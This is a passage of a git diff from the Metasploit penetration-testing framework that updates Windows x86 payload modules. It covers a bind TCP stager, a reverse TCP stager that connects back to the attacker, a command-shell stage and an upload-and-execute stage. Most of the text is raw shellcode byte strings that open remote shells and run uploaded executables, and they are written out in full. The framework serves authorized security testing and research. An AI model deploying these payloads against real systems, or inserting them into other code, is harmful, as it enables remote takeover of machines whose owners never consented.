"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +
|
||||
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +
|
||||
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +
|
||||
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +
|
||||
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +
|
||||
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +
|
||||
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Bind TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -32,34 +32,27 @@ module Metasploit3
|
|||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 276+1, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc"+
|
||||
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +
|
||||
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +
|
||||
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +
|
||||
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +
|
||||
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +
|
||||
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" +
|
||||
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" +
|
||||
"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" +
|
||||
"\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" +
|
||||
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +
|
||||
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +
|
||||
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" +
|
||||
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +
|
||||
"\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +
|
||||
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +
|
||||
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +
|
||||
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +
|
||||
"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +
|
||||
"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" +
|
||||
"\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" +
|
||||
"\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" +
|
||||
"\xff\xd3"
|
||||
'Offsets' => { 'LPORT' => [ 201, 'n' ] },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" +
|
||||
"\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" +
|
||||
"\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" +
|
||||
"\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -100,5 +100,18 @@ module Metasploit3
|
|||
# Return the updated payload
|
||||
return p
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Reverse TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -32,32 +32,26 @@ module Metasploit3
|
|||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 263, 'ADDR' ],
|
||||
'LPORT' => [ 270, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" +
|
||||
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
|
||||
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" +
|
||||
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
|
||||
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" +
|
||||
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" +
|
||||
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" +
|
||||
"\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" +
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" +
|
||||
"\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" +
|
||||
"\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" +
|
||||
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" +
|
||||
"\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" +
|
||||
"\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" +
|
||||
"\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" +
|
||||
"\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" +
|
||||
"\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" +
|
||||
"\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" +
|
||||
"\x57\xff\x55\x18\xff\xd3"
|
||||
'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" +
|
||||
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" +
|
||||
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" +
|
||||
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
|
||||
"\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -22,7 +22,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Command Shell',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Spawn a piped command shell',
|
||||
'Author' => 'spoonm',
|
||||
'Author' => [ 'spoonm', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -35,39 +35,23 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 443, 'V' ]
|
||||
'EXITFUNC' => [ 210, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+
|
||||
"\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+
|
||||
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+
|
||||
"\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+
|
||||
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+
|
||||
"\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+
|
||||
"\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+
|
||||
"\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+
|
||||
"\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+
|
||||
"\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+
|
||||
"\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+
|
||||
"\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+
|
||||
"\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+
|
||||
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+
|
||||
"\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+
|
||||
"\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+
|
||||
"\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+
|
||||
"\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+
|
||||
"\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+
|
||||
"\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+
|
||||
"\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+
|
||||
"\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+
|
||||
"\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+
|
||||
"\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+
|
||||
"\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+
|
||||
"\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+
|
||||
"\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+
|
||||
"\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" +
|
||||
"\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" +
|
||||
"\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" +
|
||||
"\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
|
||||
"\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
|
||||
"\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -22,7 +22,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Upload/Execute',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Uploads an executable and runs it',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => ['vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -31,34 +31,33 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 385, 'V' ]
|
||||
'EXITFUNC' => [ 368, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" +
|
||||
"\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" +
|
||||
"\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" +
|
||||
"\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" +
|
||||
"\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" +
|
||||
"\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +
|
||||
"\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" +
|
||||
"\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" +
|
||||
"\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" +
|
||||
"\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" +
|
||||
"\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" +
|
||||
"\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" +
|
||||
"\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" +
|
||||
"\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" +
|
||||
"\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" +
|
||||
"\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" +
|
||||
"\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" +
|
||||
"\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" +
|
||||
"\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" +
|
||||
"\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" +
|
||||
"\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" +
|
||||
"\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" +
|
||||
"\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" +
|
||||
"\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" +
|
||||
"\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" +
|
||||
"\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" +
|
||||
"\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" +
|
||||
"\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" +
|
||||
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
"\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" +
|
||||
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
|
||||
"\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" +
|
||||
"\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" +
|
||||
"\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" +
|
||||
"\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" +
|
||||
"\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" +
|
||||
"\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" +
|
||||
"\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" +
|
||||
"\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
|
@ -73,7 +72,12 @@ module Metasploit3
|
|||
#
|
||||
def handle_connection_stage(conn)
|
||||
begin
|
||||
data = ::IO.read(datastore['PEXEC'])
|
||||
# bug fix for: data = ::IO.read(datastore['PEXEC'])
|
||||
# the above does not return the entire contents
|
||||
data = ""
|
||||
File.open( datastore['PEXEC'], "rb" ) { |f|
|
||||
data += f.read
|
||||
}
|
||||
rescue
|
||||
print_error("Failed to read executable: #{$!}")
|
||||
|
||||
|
|
Loading…
Reference in New Issue